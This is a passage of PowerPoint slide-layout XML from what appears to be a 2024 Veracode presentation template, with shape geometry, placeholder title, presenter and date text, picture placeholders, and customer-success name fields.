                <a:gd name="connsiteX5" fmla="*/ 13335 w 148589"/>
                <a:gd name="connsiteY5" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY6" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY7" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX8" fmla="*/ 13335 w 148589"/>
                <a:gd name="connsiteY8" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX9" fmla="*/ 115252 w 148589"/>
                <a:gd name="connsiteY9" fmla="*/ 224790 h 262890"/>
                <a:gd name="connsiteX10" fmla="*/ 148590 w 148589"/>
                <a:gd name="connsiteY10" fmla="*/ 131445 h 262890"/>
                <a:gd name="connsiteX11" fmla="*/ 121920 w 148589"/>
                <a:gd name="connsiteY11" fmla="*/ 47625 h 262890"/>
                <a:gd name="connsiteX12" fmla="*/ 14288 w 148589"/>
                <a:gd name="connsiteY12" fmla="*/ 0 h 262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89" h="262890">
                  <a:moveTo>
                    <a:pt x="14288" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14288" y="52388"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77152" y="52388"/>
                    <a:pt x="93345" y="102870"/>
                    <a:pt x="93345" y="132398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93345" y="202883"/>
                    <a:pt x="37147" y="210503"/>
                    <a:pt x="13335" y="210503"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13335" y="262890"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57150" y="262890"/>
                    <a:pt x="89535" y="250508"/>
                    <a:pt x="115252" y="224790"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135255" y="204788"/>
                    <a:pt x="148590" y="167640"/>
                    <a:pt x="148590" y="131445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148590" y="102870"/>
                    <a:pt x="138113" y="71438"/>
                    <a:pt x="121920" y="47625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98108" y="16193"/>
                    <a:pt x="61913" y="0"/>
                    <a:pt x="14288" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9030D7CE-3EFB-ADE4-C1B7-CC32B991A559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325965" y="1801907"/>
            <a:ext cx="8308522" cy="2166240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="6600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Long title can go here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0818B16-626F-F451-C632-8A73A1AE0078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325439" y="4110875"/>
            <a:ext cx="6559456" cy="561935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="177800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="344488" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="522288" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="690562" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Short supporting copy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="601" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C361A5E-CE87-737A-7102-C0E585229E4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325439" y="4940968"/>
            <a:ext cx="6559455" cy="781157"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Presenter name, Presenter name </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&amp; Presenter name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C39AB218-88AF-BA64-74D9-26CB0BA51A76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325439" y="5900608"/>
            <a:ext cx="6559455" cy="331257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Date here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40117386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4" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07866EC7-71AF-BAB4-BC74-9F973A9E9B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1821EFA5-F565-1133-C82C-A3F2BC90B35B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2658719185"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:wipe dir="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Content_Light_Title_Subhead">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="F9FFFF"/>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a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="4619672" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBAE7429-594E-42A1-A5E3-FEB03FABFA70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="307640"/>
            <a:ext cx="11472725" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49C1B5B4-04E9-30FC-34F9-C17DAFB434FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="1019678"/>
            <a:ext cx="11472863" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="177800" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="344488" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="522288" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="690562" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Google Shape;1030;p60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC326287-D4BA-60CF-5C62-76C0E7272B44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4804424" y="1804608"/>
            <a:ext cx="0" cy="4488037"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824761CB-2C01-57C5-FE08-0D9150B918B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397498" y="2538608"/>
            <a:ext cx="877685" cy="877685"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="Google Shape;1030;p60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFB72D65-257B-F380-09A9-10F9F3A6AE61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7948453" y="1804608"/>
            <a:ext cx="0" cy="4488037"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Picture Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACA2A2AB-552D-A9D0-5631-8F9407752DEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397498" y="4896204"/>
            <a:ext cx="877685" cy="877685"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CACF5BAD-357A-B57D-CABE-40C0883B5A67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397498" y="3724087"/>
            <a:ext cx="877685" cy="877685"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62C9929B-0C21-CB4F-BA15-22631DCD6278}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-26649" y="285688"/>
            <a:ext cx="124185" cy="710850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="AE7071"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="007EA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12" name="Text Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AFC8212-AE6B-F67D-F164-1D215E5168D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1358915" y="2376969"/>
            <a:ext cx="3152121" cy="1095375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[CSM Name]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Customer Success Manager</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D9CBA0F-9638-5604-8C6F-A4C4FD327FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1358915" y="3723169"/>
            <a:ext cx="3152121" cy="1095375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[CSE Name]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Customer Success Engineer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59346993-B988-7C8C-9D29-E80008B76082}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1358915" y="5069369"/>
            <a:ext cx="3152121" cy="1095375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
